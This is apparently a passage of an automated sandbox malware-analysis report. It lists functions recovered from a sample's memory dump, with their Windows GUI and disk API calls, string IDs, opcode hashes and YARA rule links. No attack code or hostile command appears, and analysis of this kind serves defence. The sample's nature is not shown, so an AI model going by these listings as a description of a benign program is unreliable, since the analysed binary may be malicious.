                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                    • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                    • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                    • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                    • Opcode ID: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                    • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                    Function 0042EF10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042EF55
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF88
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 0042EFF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000000), ref: 0042F0A9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a8da6b0a3b4820785d32a6e99519bf5ba1baf34d33d3eec9a517c422a0835b5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51E2716083109BD720DF25E981B5BB7F4FB88710F800A7EF94997392D775E8058B9A
                                                                                                                                                                                                                                                                                    Function 0042ED50 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32 ref: 0042EDC0
                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0042EDEF
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE38
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE65
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042EEC4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$LongName$BrowseFolderFromListMessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402075$8F
                                                                                                                                                                                                                                                                                    • API String ID: 3410855119-1355043766
                                                                                                                                                                                                                                                                                    • Opcode ID: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                    • Instruction ID: 60252550f2a576e17c879c635a3a802f8da064449550e8d1e332f21db53478d5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F416471508301AFD310DF65DDC8EABBBE8FB58351F40092EF55A921E0D7749849CB5A
                                                                                                                                                                                                                                                                                    Function 00431D10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00431D46
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431D78
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431D9E
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431DBC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00431DCA
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00431E69
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapClientMessageObjectRectSelectSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 2414545248-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bb2e0385ae3c531c2e170360c03eff7dceb5b5f9b27b4236f5b68df8b256744
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22412AB1508340AFC314DF68C985E5BBBE8FBC8714F048A1EF59993291DBB4E904CB66
                                                                                                                                                                                                                                                                                    Function 00423480 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(BB40E64E), ref: 00423545
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401016$^H
                                                                                                                                                                                                                                                                                    • API String ID: 390680170-2641057668
                                                                                                                                                                                                                                                                                    • Opcode ID: faab93a9ecdda988e109a15ecdd4a0b8bde11ad9370dbf823973790119351b1d
                                                                                                                                                                                                                                                                                    • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faab93a9ecdda988e109a15ecdd4a0b8bde11ad9370dbf823973790119351b1d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                    Function 00455770 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 004557C8
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32 ref: 00455855
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeInformationSpaceVolume
                                                                                                                                                                                                                                                                                    • String ID: C:\$FAT$FAT16$FAT32$NTFS
                                                                                                                                                                                                                                                                                    • API String ID: 3270478670-3579686192
                                                                                                                                                                                                                                                                                    • Opcode ID: f0af46782a5a30f8442838258ae9688fef8f3122b442d05ec30af96031f478ec
                                                                                                                                                                                                                                                                                    • Instruction ID: 9d95486116a49aac5a83eb76fc3575ce500acb11c4e489ecfb74c34df7f4e439
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0af46782a5a30f8442838258ae9688fef8f3122b442d05ec30af96031f478ec
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65316071A183015BD714EF24DC52B7B7BE4AF88705F44492EF949D6290E638D508CB9B
                                                                                                                                                                                                                                                                                    Function 0042F8E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042F900
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042F916
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 0042FA08
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3401074$3401075$3401076$3401077
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1879149864
                                                                                                                                                                                                                                                                                    • Opcode ID: c4bce1112986585be18b77c07089e63f6cda37178a12ed3d6a88cb22f3d1e080
                                                                                                                                                                                                                                                                                    • Instruction ID: b1405050125067dfa2b98fefbbf4893992a49d55c405f1a2d248d2381da72ad7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4bce1112986585be18b77c07089e63f6cda37178a12ed3d6a88cb22f3d1e080
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D3168F07903007BE674EB258D83FEA72A59B44B54F20892FB71E762D1CAF87844965C
                                                                                                                                                                                                                                                                                    Function 00424270 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,BB40E64E,00094638,?,?,00421AA0,BB40E64E), ref: 004242B3
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: %s: %I64u $3401050$3401080$8F
                                                                                                                                                                                                                                                                                    • API String ID: 730354411-3927339091
                                                                                                                                                                                                                                                                                    • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                    • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                    Function 00424AE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00424B28
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 473d6bda932dfe5e5726b0cd1595cc7b0c8836d5ab7cb817983b5e362455a3d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A21D87176021077EB60AA94DCC6FD12354AB54B05F44407ABB04BE1C6CFEA6440CB69
                                                                                                                                                                                                                                                                                    Function 00424ED0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401031$3401091$3401092$3401093$3401094
                                                                                                                                                                                                                                                                                    • API String ID: 0-3392424511
                                                                                                                                                                                                                                                                                    • Opcode ID: 37d193ba372bf6e1c91e1fe5256a9aaebbc690362ae3da444b1a8ca7c1b4217e
                                                                                                                                                                                                                                                                                    • Instruction ID: 77c164478e0e43f67134d1fe4851d669f71d822fc0b7581da06b97669060cadb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37d193ba372bf6e1c91e1fe5256a9aaebbc690362ae3da444b1a8ca7c1b4217e
